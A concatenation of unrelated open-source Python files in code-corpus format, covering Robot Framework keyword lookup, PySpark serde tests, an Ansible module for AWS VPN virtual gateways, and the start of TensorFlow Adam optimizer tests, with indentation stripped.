return self._get_lib_by_instance(name_or_instance)
def _get_lib_by_name(self, name):
if name in self.libraries:
return self.libraries[name]
matches = [lib for lib in self.libraries.values() if eq(lib.name, name)]
if len(matches) == 1:
return matches[0]
self._no_library_found(name, multiple=bool(matches))
def _no_library_found(self, name, multiple=False):
if multiple:
raise DataError("Multiple libraries matching '%s' found." % name)
raise DataError("No library '%s' found." % name)
def _get_lib_by_instance(self, instance):
for lib in self.libraries.values():
if lib.get_instance(create=False) is instance:
return lib
self._no_library_found(instance)
def get_runner(self, name):
runner = self._get_runner(name)
if runner is None:
self._raise_no_keyword_found(name)
return runner
def _raise_no_keyword_found(self, name):
msg = "No keyword with name '%s' found." % name
finder = KeywordRecommendationFinder(self.user_keywords,
self.libraries,
self.resources)
recommendations = finder.recommend_similar_keywords(name)
msg = finder.format_recommendations(msg, recommendations)
raise DataError(msg)
def _get_runner(self, name):
if not name:
raise DataError('Keyword name cannot be empty.')
if not is_string(name):
raise DataError('Keyword name must be a string.')
runner = self._get_runner_from_test_case_file(name)
if not runner and '.' in name:
runner = self._get_explicit_runner(name)
if not runner:
runner = self._get_implicit_runner(name)
if not runner:
runner = self._get_bdd_style_runner(name)
return runner
def _get_bdd_style_runner(self, name):
for prefix in ['given ', 'when ', 'then ', 'and ', 'but ']:
if name.lower().startswith(prefix):
runner = self._get_runner(name[len(prefix):])
if runner:
runner = copy.copy(runner)
runner.name = name
return runner
return None
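# Editor's note: for example, a step written as "Given login should succeed"
# resolves to the keyword "login should succeed"; the runner is copied and
# renamed above so that logs show the full BDD-prefixed name as it was used.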
def _get_implicit_runner(self, name):
runner = self._get_runner_from_resource_files(name)
if not runner:
runner = self._get_runner_from_libraries(name)
return runner
def _get_runner_from_test_case_file(self, name):
if name in self.user_keywords.handlers:
return self.user_keywords.handlers.create_runner(name)
def _get_runner_from_resource_files(self, name):
found = [lib.handlers.create_runner(name)
for lib in self.resources.values()
if name in lib.handlers]
if not found:
return None
if len(found) > 1:
found = self._get_runner_based_on_search_order(found)
if len(found) == 1:
return found[0]
self._raise_multiple_keywords_found(name, found)
def _get_runner_from_libraries(self, name):
found = [lib.handlers.create_runner(name) for lib in self.libraries.values()
if name in lib.handlers]
if not found:
return None
if len(found) > 1:
found = self._get_runner_based_on_search_order(found)
if len(found) == 2:
found = self._filter_stdlib_runner(*found)
if len(found) == 1:
return found[0]
self._raise_multiple_keywords_found(name, found)
def _get_runner_based_on_search_order(self, runners):
for libname in self.search_order:
for runner in runners:
if eq(libname, runner.libname):
return [runner]
return runners
def _filter_stdlib_runner(self, runner1, runner2):
stdlibs_without_remote = STDLIBS - set(['Remote'])
if runner1.library.orig_name in stdlibs_without_remote:
standard, custom = runner1, runner2
elif runner2.library.orig_name in stdlibs_without_remote:
standard, custom = runner2, runner1
else:
return [runner1, runner2]
if not RUN_KW_REGISTER.is_run_keyword(custom.library.orig_name, custom.name):
self._custom_and_standard_keyword_conflict_warning(custom, standard)
return [custom]
def _custom_and_standard_keyword_conflict_warning(self, custom, standard):
custom_with_name = standard_with_name = ''
if custom.library.name != custom.library.orig_name:
custom_with_name = " imported as '%s'" % custom.library.name
if standard.library.name != standard.library.orig_name:
standard_with_name = " imported as '%s'" % standard.library.name
warning = Message("Keyword '%s' found both from a custom test library "
"'%s'%s and a standard library '%s'%s. The custom "
"keyword is used. To select explicitly, and to get "
"rid of this warning, use either '%s' or '%s'."
% (standard.name,
custom.library.orig_name, custom_with_name,
standard.library.orig_name, standard_with_name,
custom.longname, standard.longname), level='WARN')
if custom.pre_run_messages:
custom.pre_run_messages.append(warning)
else:
custom.pre_run_messages = [warning]
def _get_explicit_runner(self, name):
found = []
for owner_name, kw_name in self._yield_owner_and_kw_names(name):
found.extend(self._find_keywords(owner_name, kw_name))
if len(found) > 1:
self._raise_multiple_keywords_found(name, found, implicit=False)
return found[0] if found else None
def _yield_owner_and_kw_names(self, full_name):
tokens = full_name.split('.')
for i in range(1, len(tokens)):
yield '.'.join(tokens[:i]), '.'.join(tokens[i:])
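# Editor's note (illustrative): for the full name 'MyLib.Sub.Keyword' this
# yields ('MyLib', 'Sub.Keyword') and ('MyLib.Sub', 'Keyword'), so every
# possible owner/keyword split is tried.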
def _find_keywords(self, owner_name, name):
return [owner.handlers.create_runner(name)
for owner in chain(self.libraries.values(), self.resources.values())
if eq(owner.name, owner_name) and name in owner.handlers]
def _raise_multiple_keywords_found(self, name, found, implicit=True):
error = "Multiple keywords with name '%s' found" % name
if implicit:
error += ". Give the full name of the keyword you want to use"
names = sorted(runner.longname for runner in found)
raise DataError('\n '.join([error+':'] + names))
class KeywordRecommendationFinder(object):
def __init__(self, user_keywords, libraries, resources):
self.user_keywords = user_keywords
self.libraries = libraries
self.resources = resources
def recommend_similar_keywords(self, name):
"""Return keyword names similar to `name`."""
candidates = self._get_candidates('.' in name)
normalizer = lambda name: candidates.get(name, name).lower().replace(
'_', ' ')
finder = RecommendationFinder(normalizer)
return finder.find_recommendations(name, candidates)
@staticmethod
def format_recommendations(msg, recommendations):
return RecommendationFinder.format_recommendations(
msg, recommendations)
def _get_candidates(self, use_full_name):
names = {}
for owner, name in self._get_all_handler_names():
full_name = '%s.%s' % (owner, name) if owner else name
names[full_name] = full_name if use_full_name else name
return names
def _get_all_handler_names(self):
"""Return a list of `(library_name, handler_name)` tuples."""
handlers = [('', printable_name(handler.name, True))
for handler in self.user_keywords.handlers]
for library in chain(self.libraries.values(), self.resources.values()):
if library.name != 'Reserved':
handlers.extend(
((library.name or '',
printable_name(handler.name, code_style=True))
for handler in library.handlers))
# sort handlers to ensure consistent ordering between Jython and Python
return sorted(handlers)
|
apache-2.0
|
zero323/spark
|
python/pyspark/sql/tests/test_serde.py
|
23
|
6188
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import datetime
import shutil
import tempfile
import time
from pyspark.sql import Row
from pyspark.sql.functions import lit
from pyspark.sql.types import StructType, StructField, DecimalType, BinaryType
from pyspark.testing.sqlutils import ReusedSQLTestCase, UTCOffsetTimezone
class SerdeTests(ReusedSQLTestCase):
def test_serialize_nested_array_and_map(self):
d = [Row(l=[Row(a=1, b='s')], d={"key": Row(c=1.0, d="2")})]
rdd = self.sc.parallelize(d)
df = self.spark.createDataFrame(rdd)
row = df.head()
self.assertEqual(1, len(row.l))
self.assertEqual(1, row.l[0].a)
self.assertEqual("2", row.d["key"].d)
l = df.rdd.map(lambda x: x.l).first()
self.assertEqual(1, len(l))
self.assertEqual('s', l[0].b)
d = df.rdd.map(lambda x: x.d).first()
self.assertEqual(1, len(d))
self.assertEqual(1.0, d["key"].c)
row = df.rdd.map(lambda x: x.d["key"]).first()
self.assertEqual(1.0, row.c)
self.assertEqual("2", row.d)
def test_select_null_literal(self):
df = self.spark.sql("select null as col")
self.assertEqual(Row(col=None), df.first())
def test_struct_in_map(self):
d = [Row(m={Row(i=1): Row(s="")})]
df = self.sc.parallelize(d).toDF()
k, v = list(df.head().m.items())[0]
self.assertEqual(1, k.i)
self.assertEqual("", v.s)
def test_filter_with_datetime(self):
time = datetime.datetime(2015, 4, 17, 23, 1, 2, 3000)
date = time.date()
row = Row(date=date, time=time)
df = self.spark.createDataFrame([row])
self.assertEqual(1, df.filter(df.date == date).count())
self.assertEqual(1, df.filter(df.time == time).count())
self.assertEqual(0, df.filter(df.date > date).count())
self.assertEqual(0, df.filter(df.time > time).count())
def test_filter_with_datetime_timezone(self):
dt1 = datetime.datetime(2015, 4, 17, 23, 1, 2, 3000, tzinfo=UTCOffsetTimezone(0))
dt2 = datetime.datetime(2015, 4, 17, 23, 1, 2, 3000, tzinfo=UTCOffsetTimezone(1))
row = Row(date=dt1)
df = self.spark.createDataFrame([row])
self.assertEqual(0, df.filter(df.date == dt2).count())
self.assertEqual(1, df.filter(df.date > dt2).count())
self.assertEqual(0, df.filter(df.date < dt2).count())
def test_time_with_timezone(self):
day = datetime.date.today()
now = datetime.datetime.now()
ts = time.mktime(now.timetuple())
# class in __main__ is not serializable
from pyspark.testing.sqlutils import UTCOffsetTimezone
utc = UTCOffsetTimezone()
utcnow = datetime.datetime.utcfromtimestamp(ts) # without microseconds
# add microseconds to utcnow (keeping year,month,day,hour,minute,second)
utcnow = datetime.datetime(*(utcnow.timetuple()[:6] + (now.microsecond, utc)))
df = self.spark.createDataFrame([(day, now, utcnow)])
day1, now1, utcnow1 = df.first()
self.assertEqual(day1, day)
self.assertEqual(now, now1)
self.assertEqual(now, utcnow1)
# regression test for SPARK-19561
def test_datetime_at_epoch(self):
epoch = datetime.datetime.fromtimestamp(0)
df = self.spark.createDataFrame([Row(date=epoch)])
first = df.select('date', lit(epoch).alias('lit_date')).first()
self.assertEqual(first['date'], epoch)
self.assertEqual(first['lit_date'], epoch)
def test_decimal(self):
from decimal import Decimal
schema = StructType([StructField("decimal", DecimalType(10, 5))])
df = self.spark.createDataFrame([(Decimal("3.14159"),)], schema)
row = df.select(df.decimal + 1).first()
self.assertEqual(row[0], Decimal("4.14159"))
tmpPath = tempfile.mkdtemp()
shutil.rmtree(tmpPath)
df.write.parquet(tmpPath)
df2 = self.spark.read.parquet(tmpPath)
row = df2.first()
self.assertEqual(row[0], Decimal("3.14159"))
def test_BinaryType_serialization(self):
# Pyrolite version <= 4.9 could not serialize BinaryType with Python3 SPARK-17808
# The empty bytearray is test for SPARK-21534.
schema = StructType([StructField('mybytes', BinaryType())])
data = [[bytearray(b'here is my data')],
[bytearray(b'and here is some more')],
[bytearray(b'')]]
df = self.spark.createDataFrame(data, schema=schema)
df.collect()
def test_int_array_serialization(self):
# Note that this test seems dependent on parallelism.
data = self.spark.sparkContext.parallelize([[1, 2, 3, 4]] * 100, numSlices=12)
df = self.spark.createDataFrame(data, "array<integer>")
self.assertEqual(len(list(filter(lambda r: None in r.value, df.collect()))), 0)
def test_bytes_as_binary_type(self):
df = self.spark.createDataFrame([[b"abcd"]], "col binary")
self.assertEqual(df.first().col, bytearray(b'abcd'))
if __name__ == "__main__":
import unittest
from pyspark.sql.tests.test_serde import * # noqa: F401
try:
import xmlrunner # type: ignore[import]
testRunner = xmlrunner.XMLTestRunner(output='target/test-reports', verbosity=2)
except ImportError:
testRunner = None
unittest.main(testRunner=testRunner, verbosity=2)
|
apache-2.0
|
PriceChild/ansible
|
lib/ansible/modules/cloud/amazon/ec2_vpc_vgw.py
|
69
|
20312
|
#!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['stableinterface'],
'supported_by': 'curated'}
DOCUMENTATION = '''
module: ec2_vpc_vgw
short_description: Create and delete AWS VPN Virtual Gateways.
description:
- Creates AWS VPN Virtual Gateways
- Deletes AWS VPN Virtual Gateways
- Attaches Virtual Gateways to VPCs
- Detaches Virtual Gateways from VPCs
version_added: "2.2"
requirements: [ boto3 ]
options:
state:
description:
- present to ensure resource is created.
- absent to remove resource
required: false
default: present
choices: [ "present", "absent"]
name:
description:
- name of the vgw to be created or deleted
required: false
type:
description:
- type of the virtual gateway to be created
required: false
choices: [ "ipsec.1" ]
vpn_gateway_id:
description:
- vpn gateway id of an existing virtual gateway
required: false
vpc_id:
description:
- the vpc-id of a vpc to attach or detach
required: false
wait_timeout:
description:
- number of seconds to wait for status during vpc attach and detach
required: false
default: 320
tags:
description:
- dictionary of resource tags
required: false
default: null
aliases: [ "resource_tags" ]
author: Nick Aslanidis (@naslanidis)
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
- name: Create a new vgw attached to a specific VPC
ec2_vpc_vgw:
state: present
region: ap-southeast-2
profile: personal
vpc_id: vpc-12345678
name: personal-testing
type: ipsec.1
register: created_vgw
- name: Create a new unattached vgw
ec2_vpc_vgw:
state: present
region: ap-southeast-2
profile: personal
name: personal-testing
type: ipsec.1
tags:
environment: production
owner: ABC
register: created_vgw
- name: Remove a new vgw using the name
ec2_vpc_vgw:
state: absent
region: ap-southeast-2
profile: personal
name: personal-testing
type: ipsec.1
register: deleted_vgw
- name: Remove a new vgw using the vpn_gateway_id
ec2_vpc_vgw:
state: absent
region: ap-southeast-2
profile: personal
vpn_gateway_id: vgw-3a9aa123
register: deleted_vgw
'''
RETURN = '''
result:
description: The result of the create, or delete action.
returned: success
type: dictionary
'''
try:
import json
import time
import botocore
import boto3
HAS_BOTO3 = True
except ImportError:
HAS_BOTO3 = False
def get_vgw_info(vgws):
if not isinstance(vgws, list):
return
for vgw in vgws:
vgw_info = {
'id': vgw['VpnGatewayId'],
'type': vgw['Type'],
'state': vgw['State'],
'vpc_id': None,
'tags': dict()
}
for tag in vgw['Tags']:
vgw_info['tags'][tag['Key']] = tag['Value']
if len(vgw['VpcAttachments']) != 0 and vgw['VpcAttachments'][0]['State'] == 'attached':
vgw_info['vpc_id'] = vgw['VpcAttachments'][0]['VpcId']
return vgw_info
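# Editor's note (illustrative): for an attached gateway, get_vgw_info returns
# a dict shaped like
#     {'id': 'vgw-3a9aa123', 'type': 'ipsec.1', 'state': 'available',
#      'vpc_id': 'vpc-12345678', 'tags': {'Name': 'personal-testing'}}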
def wait_for_status(client, module, vpn_gateway_id, status):
polling_increment_secs = 15
max_retries = module.params.get('wait_timeout') // polling_increment_secs
status_achieved = False
for x in range(0, max_retries):
try:
response = find_vgw(client, module, vpn_gateway_id)
if response[0]['VpcAttachments'][0]['State'] == status:
status_achieved = True
break
else:
time.sleep(polling_increment_secs)
except botocore.exceptions.ClientError:
e = get_exception()
module.fail_json(msg=str(e))
result = response
return status_achieved, result
def attach_vgw(client, module, vpn_gateway_id):
params = dict()
params['VpcId'] = module.params.get('vpc_id')
try:
response = client.attach_vpn_gateway(VpnGatewayId=vpn_gateway_id, VpcId=params['VpcId'])
except botocore.exceptions.ClientError:
e = get_exception()
module.fail_json(msg=str(e))
status_achieved, vgw = wait_for_status(client, module, [vpn_gateway_id], 'attached')
if not status_achieved:
module.fail_json(msg='Error waiting for vpc to attach to vgw - please check the AWS console')
result = response
return result
def detach_vgw(client, module, vpn_gateway_id, vpc_id=None):
params = dict()
params['VpcId'] = module.params.get('vpc_id')
if vpc_id:
try:
response = client.detach_vpn_gateway(VpnGatewayId=vpn_gateway_id, VpcId=vpc_id)
except botocore.exceptions.ClientError:
e = get_exception()
module.fail_json(msg=str(e))
else:
try:
response = client.detach_vpn_gateway(VpnGatewayId=vpn_gateway_id, VpcId=params['VpcId'])
except botocore.exceptions.ClientError:
e = get_exception()
module.fail_json(msg=str(e))
status_achieved, vgw = wait_for_status(client, module, [vpn_gateway_id], 'detached')
if not status_achieved:
module.fail_json(msg='Error waiting for vpc to detach from vgw - please check the AWS console')
result = response
return result
def create_vgw(client, module):
params = dict()
params['Type'] = module.params.get('type')
try:
response = client.create_vpn_gateway(Type=params['Type'])
except botocore.exceptions.ClientError:
e = get_exception()
module.fail_json(msg=str(e))
result = response
return result
def delete_vgw(client, module, vpn_gateway_id):
try:
response = client.delete_vpn_gateway(VpnGatewayId=vpn_gateway_id)
except botocore.exceptions.ClientError:
e = get_exception()
module.fail_json(msg=str(e))
#return the deleted VpnGatewayId as this is not included in the above response
result = vpn_gateway_id
return result
def create_tags(client, module, vpn_gateway_id):
params = dict()
try:
response = client.create_tags(Resources=[vpn_gateway_id],Tags=load_tags(module))
except botocore.exceptions.ClientError:
e = get_exception()
module.fail_json(msg=str(e))
result = response
return result
def delete_tags(client, module, vpn_gateway_id, tags_to_delete=None):
params = dict()
if tags_to_delete:
try:
response = client.delete_tags(Resources=[vpn_gateway_id], Tags=tags_to_delete)
except botocore.exceptions.ClientError:
e = get_exception()
module.fail_json(msg=str(e))
else:
try:
response = client.delete_tags(Resources=[vpn_gateway_id])
except botocore.exceptions.ClientError:
e = get_exception()
module.fail_json(msg=str(e))
result = response
return result
def load_tags(module):
tags = []
if module.params.get('tags'):
for name, value in module.params.get('tags').items():
tags.append({'Key': name, 'Value': str(value)})
tags.append({'Key': "Name", 'Value': module.params.get('name')})
else:
tags.append({'Key': "Name", 'Value': module.params.get('name')})
return tags
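# Editor's note (illustrative): with module params name='personal-testing' and
# tags={'environment': 'production'}, load_tags returns
#     [{'Key': 'environment', 'Value': 'production'},
#      {'Key': 'Name', 'Value': 'personal-testing'}]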
def find_tags(client, module, resource_id=None):
if resource_id:
try:
response = client.describe_tags(Filters=[
{'Name': 'resource-id', 'Values': [resource_id]}
])
except botocore.exceptions.ClientError:
e = get_exception()
module.fail_json(msg=str(e))
result = response
return result
def check_tags(client, module, existing_vgw, vpn_gateway_id):
params = dict()
params['Tags'] = module.params.get('tags')
vgw = existing_vgw
changed = False
tags_list = {}
#format tags for comparison
for tags in existing_vgw[0]['Tags']:
if tags['Key'] != 'Name':
tags_list[tags['Key']] = tags['Value']
# if existing tags don't match the tags arg, delete existing and recreate with new list
if params['Tags'] is not None and tags_list != params['Tags']:
delete_tags(client, module, vpn_gateway_id)
create_tags(client, module, vpn_gateway_id)
vgw = find_vgw(client, module)
changed = True
#if no tag args are supplied, delete any existing tags with the exception of the name tag
if params['Tags'] is None and tags_list != {}:
tags_to_delete = []
for tags in existing_vgw[0]['Tags']:
if tags['Key'] != 'Name':
tags_to_delete.append(tags)
delete_tags(client, module, vpn_gateway_id, tags_to_delete)
vgw = find_vgw(client, module)
changed = True
return vgw, changed
def find_vpc(client, module):
params = dict()
params['vpc_id'] = module.params.get('vpc_id')
if params['vpc_id']:
try:
response = client.describe_vpcs(VpcIds=[params['vpc_id']])
except botocore.exceptions.ClientError:
e = get_exception()
module.fail_json(msg=str(e))
result = response
return result
def find_vgw(client, module, vpn_gateway_id=None):
params = dict()
params['Name'] = module.params.get('name')
params['Type'] = module.params.get('type')
params['State'] = module.params.get('state')
if params['State'] == 'present':
try:
response = client.describe_vpn_gateways(Filters=[
{'Name': 'type', 'Values': [params['Type']]},
{'Name': 'tag:Name', 'Values': [params['Name']]}
])
except botocore.exceptions.ClientError:
e = get_exception()
module.fail_json(msg=str(e))
else:
if vpn_gateway_id:
try:
response = client.describe_vpn_gateways(VpnGatewayIds=vpn_gateway_id)
except botocore.exceptions.ClientError:
e = get_exception()
module.fail_json(msg=str(e))
else:
try:
response = client.describe_vpn_gateways(Filters=[
{'Name': 'type', 'Values': [params['Type']]},
{'Name': 'tag:Name', 'Values': [params['Name']]}
])
except botocore.exceptions.ClientError:
e = get_exception()
module.fail_json(msg=str(e))
result = response['VpnGateways']
return result
def ensure_vgw_present(client, module):
# If an existing vgw name and type matches our args, then a match is considered to have been
# found and we will not create another vgw.
changed = False
params = dict()
result = dict()
params['Name'] = module.params.get('name')
params['VpcId'] = module.params.get('vpc_id')
params['Type'] = module.params.get('type')
params['Tags'] = module.params.get('tags')
params['VpnGatewayIds'] = module.params.get('vpn_gateway_id')
# Check that a name argument has been supplied.
if not module.params.get('name'):
module.fail_json(msg='A name is required when a status of \'present\' is supplied')
# check if a gateway matching our module args already exists
existing_vgw = find_vgw(client, module)
if existing_vgw != [] and existing_vgw[0]['State'] != 'deleted':
vpn_gateway_id = existing_vgw[0]['VpnGatewayId']
vgw, changed = check_tags(client, module, existing_vgw, vpn_gateway_id)
# if a vpc_id was provided, check if it exists and if it's attached
if params['VpcId']:
# check that the vpc_id exists. If not, an exception is thrown
vpc = find_vpc(client, module)
current_vpc_attachments = existing_vgw[0]['VpcAttachments']
if current_vpc_attachments != [] and current_vpc_attachments[0]['State'] == 'attached':
if current_vpc_attachments[0]['VpcId'] == params['VpcId'] and current_vpc_attachments[0]['State'] == 'attached':
changed = False
else:
# detach the existing vpc from the virtual gateway
vpc_to_detach = current_vpc_attachments[0]['VpcId']
detach_vgw(client, module, vpn_gateway_id, vpc_to_detach)
time.sleep(5)
attached_vgw = attach_vgw(client, module, vpn_gateway_id)
vgw = find_vgw(client, module, [vpn_gateway_id])
changed = True
else:
# attach the vgw to the supplied vpc
attached_vgw = attach_vgw(client, module, vpn_gateway_id)
vgw = find_vgw(client, module, [vpn_gateway_id])
changed = True
# if params['VpcId'] is not provided, check the vgw is attached to a vpc. if so, detach it.
else:
existing_vgw = find_vgw(client, module, [vpn_gateway_id])
if existing_vgw[0]['VpcAttachments'] != []:
if existing_vgw[0]['VpcAttachments'][0]['State'] == 'attached':
# detach the vpc from the vgw
vpc_to_detach = existing_vgw[0]['VpcAttachments'][0]['VpcId']
detach_vgw(client, module, vpn_gateway_id, vpc_to_detach)
changed = True
vgw = find_vgw(client, module, [vpn_gateway_id])
else:
# create a new vgw
new_vgw = create_vgw(client, module)
changed = True
vpn_gateway_id = new_vgw['VpnGateway']['VpnGatewayId']
# tag the new virtual gateway
create_tags(client, module, vpn_gateway_id)
# return current state of the vgw
vgw = find_vgw(client, module, [vpn_gateway_id])
# if a vpc-id was supplied, attempt to attach it to the vgw
if params['VpcId']:
attached_vgw = attach_vgw(client, module, vpn_gateway_id)
changed = True
vgw = find_vgw(client, module, [vpn_gateway_id])
result = get_vgw_info(vgw)
return changed, result
def ensure_vgw_absent(client, module):
# If an existing vgw name and type matches our args, then a match is considered to have been
# found and we will take steps to delete it.
changed = False
params = dict()
result = dict()
params['Name'] = module.params.get('name')
params['VpcId'] = module.params.get('vpc_id')
params['Type'] = module.params.get('type')
params['Tags'] = module.params.get('tags')
params['VpnGatewayIds'] = module.params.get('vpn_gateway_id')
# check if a gateway matching our module args already exists
if params['VpnGatewayIds']:
existing_vgw_with_id = find_vgw(client, module, [params['VpnGatewayIds']])
if existing_vgw_with_id != [] and existing_vgw_with_id[0]['State'] != 'deleted':
existing_vgw = existing_vgw_with_id
if existing_vgw[0]['VpcAttachments'] != [] and existing_vgw[0]['VpcAttachments'][0]['State'] == 'attached':
if params['VpcId']:
if params['VpcId'] != existing_vgw[0]['VpcAttachments'][0]['VpcId']:
module.fail_json(msg='The vpc-id provided does not match the vpc-id currently attached - please check the AWS console')
else:
# detach the vpc from the vgw
detach_vgw(client, module, params['VpnGatewayIds'], params['VpcId'])
deleted_vgw = delete_vgw(client, module, params['VpnGatewayIds'])
changed = True
else:
# attempt to detach any attached vpcs
vpc_to_detach = existing_vgw[0]['VpcAttachments'][0]['VpcId']
detach_vgw(client, module, params['VpnGatewayIds'], vpc_to_detach)
deleted_vgw = delete_vgw(client, module, params['VpnGatewayIds'])
changed = True
else:
# no vpc's are attached so attempt to delete the vgw
deleted_vgw = delete_vgw(client, module, params['VpnGatewayIds'])
changed = True
else:
changed = False
deleted_vgw = "Nothing to do"
else:
#Check that a name and type argument has been supplied if no vgw-id
if not module.params.get('name') or not module.params.get('type'):
module.fail_json(msg='A name and type are required when no vgw-id is supplied and a status of \'absent\' is used')
existing_vgw = find_vgw(client, module)
if existing_vgw != [] and existing_vgw[0]['State'] != 'deleted':
vpn_gateway_id = existing_vgw[0]['VpnGatewayId']
if existing_vgw[0]['VpcAttachments'] != [] and existing_vgw[0]['VpcAttachments'][0]['State'] == 'attached':
if params['VpcId']:
if params['VpcId'] != existing_vgw[0]['VpcAttachments'][0]['VpcId']:
module.fail_json(msg='The vpc-id provided does not match the vpc-id currently attached - please check the AWS console')
else:
# detach the vpc from the vgw
detach_vgw(client, module, vpn_gateway_id, params['VpcId'])
#now that the vpc has been detached, delete the vgw
deleted_vgw = delete_vgw(client, module, vpn_gateway_id)
changed = True
else:
# attempt to detach any attached vpcs
vpc_to_detach = existing_vgw[0]['VpcAttachments'][0]['VpcId']
detach_vgw(client, module, vpn_gateway_id, vpc_to_detach)
changed = True
#now that the vpc has been detached, delete the vgw
deleted_vgw = delete_vgw(client, module, vpn_gateway_id)
else:
# no vpc's are attached so attempt to delete the vgw
deleted_vgw = delete_vgw(client, module, vpn_gateway_id)
changed = True
else:
changed = False
deleted_vgw = None
result = deleted_vgw
return changed, result
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
state=dict(default='present', choices=['present', 'absent']),
region=dict(required=True),
name=dict(),
vpn_gateway_id=dict(),
vpc_id=dict(),
wait_timeout=dict(type='int', default=320),
type=dict(default='ipsec.1', choices=['ipsec.1']),
tags=dict(default=None, required=False, type='dict', aliases=['resource_tags']),
)
)
module = AnsibleModule(argument_spec=argument_spec)
if not HAS_BOTO3:
module.fail_json(msg='json and boto3 are required.')
state = module.params.get('state').lower()
try:
region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module, boto3=True)
client = boto3_conn(module, conn_type='client', resource='ec2', region=region, endpoint=ec2_url, **aws_connect_kwargs)
except botocore.exceptions.NoCredentialsError:
e = get_exception()
module.fail_json(msg="Can't authorize connection - "+str(e))
if state == 'present':
(changed, results) = ensure_vgw_present(client, module)
else:
(changed, results) = ensure_vgw_absent(client, module)
module.exit_json(changed=changed, vgw=results)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.ec2 import *
if __name__ == '__main__':
main()
|
gpl-3.0
|
alisidd/tensorflow
|
tensorflow/compiler/tests/adam_test.py
|
79
|
7193
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Adam."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.compiler.tests.xla_test import XLATestCase
from tensorflow.python.framework import constant_op
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import adam
def adam_update_numpy(param,
g_t,
t,
m,
v,
alpha=0.001,
beta1=0.9,
beta2=0.999,
epsilon=1e-8):
alpha_t = alpha * np.sqrt(1 - beta2**t) / (1 - beta1**t)
m_t = beta1 * m + (1 - beta1) * g_t
v_t = beta2 * v + (1 - beta2) * g_t * g_t
param_t = param - alpha_t * m_t / (np.sqrt(v_t) + epsilon)
return param_t, m_t, v_t
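# Editor's note: the reference implementation above follows the Adam update
#     alpha_t = alpha * sqrt(1 - beta2**t) / (1 - beta1**t)
#     m_t     = beta1 * m + (1 - beta1) * g_t
#     v_t     = beta2 * v + (1 - beta2) * g_t**2
#     param_t = param - alpha_t * m_t / (sqrt(v_t) + epsilon)
# and is what the tests below compare the optimizer's variables against.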
class AdamOptimizerTest(XLATestCase):
def testBasic(self):
for dtype in self.float_types:
with self.test_session(), self.test_scope():
variable_scope.get_variable_scope().set_use_resource(True)
# Initialize variables for numpy implementation.
m0, v0, m1, v1 = 0.0, 0.0, 0.0, 0.0
var0_np = np.array([1.0, 2.0], dtype=dtype)
grads0_np = np.array([0.1, 0.1], dtype=dtype)
var1_np = np.array([3.0, 4.0], dtype=dtype)
grads1_np = np.array([0.01, 0.01], dtype=dtype)
var0 = resource_variable_ops.ResourceVariable(var0_np)
var1 = resource_variable_ops.ResourceVariable(var1_np)
grads0 = array_ops.placeholder(dtype)
grads1 = array_ops.placeholder(dtype)
opt = adam.AdamOptimizer()
update = opt.apply_gradients(zip([grads0, grads1], [var0, var1]))
variables.global_variables_initializer().run()
# Fetch params to validate initial values
self.assertAllClose([1.0, 2.0], var0.eval())
self.assertAllClose([3.0, 4.0], var1.eval())
beta1_power, beta2_power = opt._get_beta_accumulators()
# Run 3 steps of Adam
for t in range(1, 4):
self.assertAllCloseAccordingToType(0.9**t, beta1_power.eval())
self.assertAllCloseAccordingToType(0.999**t, beta2_power.eval())
update.run(feed_dict={grads0: grads0_np, grads1: grads1_np})
var0_np, m0, v0 = adam_update_numpy(var0_np, grads0_np, t, m0, v0)
var1_np, m1, v1 = adam_update_numpy(var1_np, grads1_np, t, m1, v1)
# Validate updated params
self.assertAllCloseAccordingToType(var0_np, var0.eval())
self.assertAllCloseAccordingToType(var1_np, var1.eval())
def testTensorLearningRate(self):
for dtype in self.float_types:
with self.test_session(), self.test_scope():
variable_scope.get_variable_scope().set_use_resource(True)
# Initialize variables for numpy implementation.
m0, v0, m1, v1 = 0.0, 0.0, 0.0, 0.0
var0_np = np.array([1.0, 2.0], dtype=dtype)
grads0_np = np.array([0.1, 0.1], dtype=dtype)
var1_np = np.array([3.0, 4.0], dtype=dtype)
grads1_np = np.array([0.01, 0.01], dtype=dtype)
var0 = resource_variable_ops.ResourceVariable(var0_np)
var1 = resource_variable_ops.ResourceVariable(var1_np)
grads0 = array_ops.placeholder(dtype)
grads1 = array_ops.placeholder(dtype)
opt = adam.AdamOptimizer(constant_op.constant(0.001))
update = opt.apply_gradients(zip([grads0, grads1], [var0, var1]))
variables.global_variables_initializer().run()
# Fetch params to validate initial values
self.assertAllClose([1.0, 2.0], var0.eval())
self.assertAllClose([3.0, 4.0], var1.eval())
